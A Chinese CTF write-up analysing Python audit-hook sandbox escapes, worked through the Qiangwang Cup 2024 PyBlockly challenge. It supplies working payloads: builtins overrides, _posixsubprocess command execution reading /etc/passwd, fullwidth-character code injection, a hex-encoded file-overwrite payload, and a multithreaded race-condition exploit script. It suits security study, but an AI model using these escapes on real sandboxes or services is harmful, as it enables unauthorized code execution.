前言
前几天打的强网杯引入了一个很新的pyjail不仅有钩子函数来过滤危险事件如底层的compile
,还限制了审计事件的长度,并在语法树也对import
做了检查,特写此篇下面将会详细分析绕过各个限制。
引入Audit Hook
audit hook 是Python 3.8 中引入的新特性。也就是使用审计钩子来监控和记录 Python 程序在运行时的行为,特别是那些安全敏感的行为,如文件的读写、网络通信和动态代码的执行等。
首先我们要先了解一些pyjail的audit hook这种过滤在pyjail中经常见到
代码形式如下
import sys
def my_audit_hook(my_event, _):
WHITED_EVENTS = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'})
if my_event not in WHITED_EVENTS:
raise RuntimeError('Operation not permitted: {}'.format(my_event))
sys.addaudithook(my_audit_hook)
#sys.addaudithook(hook) 的参数 hook 是一个函数,它的定义形式为 hook(event: str, args: tuple)。其中,event 是一个描述事件名称的字符串,args 是一个包含了与该事件相关的参数的元组。
在解释器运行时,每当发生一个与安全相关的事件,就会调用该审计钩子函数。event 参数会包含事件的描述,args 参数则包含了事件的相关信息。这样,审计钩子就可以根据这些信息进行审计记录或者对某些事件进行阻止。
注意:由于 sys.addaudithook() 主要是用于增加审计和安全性,一旦一个审计钩子被添加,它不能被移除。这是为了防止恶意代码移除审计钩子以逃避审计。
绕过Audit Hook
首先我们先了解一下hook函数中的事件参数包括哪些,才能有效针对绕过
Python 中的审计事件包括但不限于以下几类:
-
import
:发生在导入模块时。 -
open
:发生在打开文件时。 -
exec
:发生在执行Python代码时。 -
compile
:发生在编译Python代码时。 -
socket
:发生在创建或使用网络套接字时。 -
os.system
,os.popen
等:发生在执行操作系统命令时。 -
subprocess.Popen
,subprocess.run
等:发生在启动子进程时
更多的可以看python官方文档:审计事件表 — Python 3.8.20 文档
可以看到基本所有的危险操作都会被hook函数所检查到,audithook 构建沙箱,属于 python 底层的实现,因此常规的变换根本无法绕过.
通过导入模块操作都会触发audit hook比如
> import ctypes
通过命令执行函数一样会触发audit hook比如
os subproccess exec等函数
篡改内置函数
我们看这段代码
import sys
def my_audit_hook(my_event, _):
WHITED_EVENTS = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'})
if my_event not in WHITED_EVENTS:
raise RuntimeError('Operation not permitted: {}'.format(my_event))
sys.addaudithook(my_audit_hook)
由于使用了set来返回白名单,这就导致了我们可以通过篡改内置函数set来让白名单变为我们想要的东西
__builtins__.set = lambda x: ['builtins.input', 'builtins.input/result','exec', 'compile', 'os.system']
最终我们这样传入code即可绕过Audit hook
exec("globals()['__builtins__']['set']=lambda x: ['builtins.input', 'builtins.input/result','exec', 'compile', 'os.system']\nimport os\nos.system('cat flag2.txt')")
load_module
导入模块
由于上述代码采用白名单,所以hook就不允许导入模块
load_module()
也是 python 中用于导入模块的一个方法并且不需要导入其他任何库但是也有一个缺点就是无法导入非内建模块. 例如 socket
__loader__.load_module('os')
__loader__
实际上指向的是 _frozen_importlib.BuiltinImporter
类,也可以通过别的方式进行获取
>>> ().__class__.__base__.__subclasses__()[84]
<class '_frozen_importlib.BuiltinImporter'>
_posixsubprocess
执行命令
posixsubprocess 模块是 Python 的内部模块,模块核心功能是 fork_exec 函数,fork_exec 提供了一个非常底层的方式来创建一个新的子进程,并在这个新进程中执行一个指定的程序。但这个模块并没有在 Python 的标准库文档中列出,每个版本的 Python 可能有所差异
下面是一个最小化示例:
import os
import _posixsubprocess
_posixsubprocess.fork_exec([b"/bin/cat","/etc/passwd"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(os.pipe()), False, False,False, None, None, None, -1, None, False)
结合上面的 __loader__.load_module(fullname)
可以得到最终的 payload:
builtins.input/result
, compile, exec 三个 hook都没有触发
__loader__.load_module('_posixsubprocess').fork_exec([b"/bin/cat","/etc/passwd"], [b"/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(__loader__.load_module('os').pipe()), False, False,False, None, None, None, -1, None, False)
其他手法
我们还可以通过python的属性来获取比如os,从而不触发hook
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "'_sitebuiltins." in str(x) and not "_Helper" in str(x) ][0]["sys"].modules["os"]
#_wrap_close
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if x.__name__=="_wrap_close"][0]["system"]("ls")
强网杯 2024 PyBlockly手法的利用
题目的源码如下:
from flask import Flask, request, jsonify
import re
import unidecode
import string
import ast
import sys
import os
import subprocess
import importlib.util
import json
app = Flask(__name__)
#flask 自动对json的\u形式的unciode自动解码
app.config['JSON_AS_ASCII'] = False
blacklist_pattern = r"[!\"#$%&'()*+,-./:;<=>?@[\\\]^_`{|}~]"
def module_exists(module_name):
spec = importlib.util.find_spec(module_name)
if spec is None:
return False
if module_name in sys.builtin_module_names:
return True
if spec.origin:
std_lib_path = os.path.dirname(os.__file__)
if spec.origin.startswith(std_lib_path) and not spec.origin.startswith(os.getcwd()):
return True
return False
def verify_secure(m):
for node in ast.walk(m):
match type(node):
case ast.Import:
print("ERROR: Banned module ")
return False
case ast.ImportFrom:
print(f"ERROR: Banned module {node.module}")
return False
return True
def check_for_blacklisted_symbols(input_text):
if re.search(blacklist_pattern, input_text):
return True
else:
return False
def block_to_python(block):
block_type = block['type']
code = ''
if block_type == 'print':
text_block = block['inputs']['TEXT']['block']
text = block_to_python(text_block)
code = f"print({text})"
elif block_type == 'math_number':
if str(block['fields']['NUM']).isdigit():
code = int(block['fields']['NUM'])
else:
code = ''
#检查text的非法字符
elif block_type == 'text':
if check_for_blacklisted_symbols(block['fields']['TEXT']):
code = ''
else:
#unicode编码绕过
code = "'" + unidecode.unidecode(block['fields']['TEXT']) + "'"
print(code)
elif block_type == 'max':
a_block = block['inputs']['A']['block']
b_block = block['inputs']['B']['block']
a = block_to_python(a_block)
b = block_to_python(b_block)
code = f"max({a}, {b})"
elif block_type == 'min':
a_block = block['inputs']['A']['block']
b_block = block['inputs']['B']['block']
a = block_to_python(a_block)
b = block_to_python(b_block)
code = f"min({a}, {b})"
if 'next' in block:
block = block['next']['block']
code +="\n" + block_to_python(block)+ "\n"
else:
return code
return code
def json_to_python(blockly_data):
block = blockly_data['blocks']['blocks'][0]
python_code = ""
python_code += block_to_python(block) + "\n"
return python_code
def do(source_code):
hook_code = '''
def my_audit_hook(event_name, arg):
blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
if len(event_name) > 4:
raise RuntimeError("Too Long!")
for bad in blacklist:
if bad in event_name:
raise RuntimeError("No!")
__import__('sys').addaudithook(my_audit_hook)
'''
print(source_code)
code = hook_code + source_code
tree = compile(source_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)
try:
if verify_secure(tree):
with open("run.py", 'w') as f:
f.write(code)
result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")
os.remove('run.py')
return result
else:
return "Execution aborted due to security concerns."
except:
os.remove('run.py')
return "Timeout!"
@app.route('/')
def index():
return app.send_static_file('index.html')
@app.route('/blockly_json', methods=['POST'])
def blockly_json():
blockly_data = request.get_data()
print(type(blockly_data))
blockly_data = json.loads(blockly_data.decode('utf-8'))
print(blockly_data)
try:
python_code = json_to_python(blockly_data)
return do(python_code)
except Exception as e:
return jsonify({"error": "Error generating Python code", "details": str(e)})
if __name__ == '__main__':
app.run(host = '0.0.0.0')
可以看到由于code过滤了很多字符
blacklist_pattern = r"[!\"#$%&'()*+,-./:;<=>?@[\\\]^_`{|}~]"
我们json传参全角符号绕过blacklist_pattern
https://zh.wikipedia.org/wiki/%E5%85%A8%E5%BD%A2%E5%92%8C%E5%8D%8A%E5%BD%A2
使用文中全角符号,中文字符通过 unicode.unicode 可以直接转英文字符,即绕过黑名单
‘)\nf=open(‘/flag’)\nprint(f.read())\n(’ # 回显为空,可能需要rce
‘)\nf=open(‘/proc/self/environ’)\nprint(f.read())\n(’ # 无泄漏
方法一
我们注意到题目代码过滤了底层的compile函数这就没有办法执行eval,exec这些函数,因为字符串传进去之后都要经过编译
blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
if len(event_name) > 4:
raise RuntimeError("Too Long!")
for bad in blacklist:
if bad in event_name:
raise RuntimeError("No!")
其次我们还看到了审计事件的长度也被限制了,这就基本没有可能RCE
len(event_name) > 4
len是一个内置函数,我们就可以通过__builtins__
覆盖len函数绕过长度检验
globals()['__builtins__'].len=lambda x: 1
同时因为在语法树上禁用了import的导入也进一步加强了waf
for node in ast.walk(m):
match type(node):
case ast.Import:
print("ERROR: Banned module ")
return False
case ast.ImportFrom:
print(f"ERROR: Banned module {node.module}")
return False
return True
通过本地测试发现虽然import被禁用了,但是动态的导入__import__
却可以绕过
__import__('os').system('whoami')
然后便可以命令执行
’)\nglobals()[‘__builtins__’].len=lambda x: 1\n__import__(‘os’).system(‘dd if=/flag’)\n(‘
最终payload如下
POST /blockly_json HTTP/1.1
Host: eci-2zebvccqe8nnivaz8wkj.cloudeci1.ichunqiu.com:5000
Sec-Fetch-Mode: cors
Accept: */*
Referer: http://127.0.0.1:5000/
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
X-Requested-With: XMLHttpRequest
Origin: http://127.0.0.1:5000
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Site: same-origin
Content-Type: application/json
Content-Length: 541
{
"blocks": {
"languageVersion": 0,
"blocks": [
{
"type": "print",
"id": "TiB};t~~=3e-553@D|nx",
"x": 104,
"y": 183,
"inputs": {
"TEXT": {
"block": {
"type": "text",
"id": "4CexaB/|[s+j!|Pfd,:_",
"fields": {
"TEXT": "’)\nglobals()[‘__builtins__’].len=lambda x: 1\n__import__(‘os’).system(‘dd if=/flag’)\n(‘"
}
}
}
}
}
]
}
}
方法二
由于沙箱没有随机文件名并且审计事件中并不包含write,导致每个都是执行一个py文件,可以多线程第一个覆盖,第二个执行run.py
但是我们需要考虑waf绕过,通过本地调试发现审计事件触发的是open
刚好4个长度也绕过了命令执行
from flask import Flask, request, jsonify
import re
import ast
import os
import subprocess
def do():
hook_code = '''
def my_audit_hook(event_name, arg):
blacklist = ["popen", "input", "eval", "exec", "compile", "memoryview"]
print(event_name)
if len(event_name) > 4:
raise RuntimeError("Too Long!")
for bad in blacklist:
if bad in event_name:
raise RuntimeError("No!")
__import__('sys').addaudithook(my_audit_hook)
(open(bytes.fromhex('72756e2e7079').decode(),'wb').write(bytes.fromhex('696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929')))
'''
tree = compile(hook_code, "run.py", 'exec', flags=ast.PyCF_ONLY_AST)
try:
with open("run.py", 'w') as f:
f.write( hook_code)
result = subprocess.run(['python', 'run.py'], stdout=subprocess.PIPE, timeout=5).stdout.decode("utf-8")
print(result)
return result
except:
os.remove('run.py')
return "Timeout!"
do()
code传入写文件代码这样即可覆盖run.py
(open(bytes.fromhex('72756e2e7079').decode(),'wb').write(bytes.fromhex('696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929')))
hex内容如下
import os
print(os.popen('dd if=/flag').read())
条件竞争脚本如下
import requests
import json
import threading
url = "http://eci-2zedptpxwuwj344tkegy.cloudeci1.ichunqiu.com:5000"
data = {
"blocks": {
"blocks": [
{
"type": "print",
"x": 101,
"y": 102,
"inputs": {
"TEXT": {
"block": {
"type": "max",
"inputs": {
"A": {
"block": {
"type": "text",
"fields": {"TEXT": "‘,‘’))\n(open(bytes。fromhex(’72756e2e7079‘)。decode(),’wb‘)。write(bytes。fromhex(’696d706f7274206f730a0a7072696e74286f732e706f70656e282764642069663d2f666c616727292e72656164282929‘)))\n\nprint(print(’1"}
}
},
"B": {
"block": {
"type": "math_number",
"fields": {"NUM": 10}
}
}
}
}
}
}
}
]
}
}
def send_request():
while True:
r = requests.post(url + "/blockly_json",
headers={"Content-Type": "application/json"}, data=json.dumps(data))
text = r.text
if "1 10" not in text and "No such file or direct" not in text and len(text) > 10:
print(text)
os.exit(-1)
break
threads = []
num_threads = 100
for _ in range(num_threads):
thread = threading.Thread(target=send_request)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()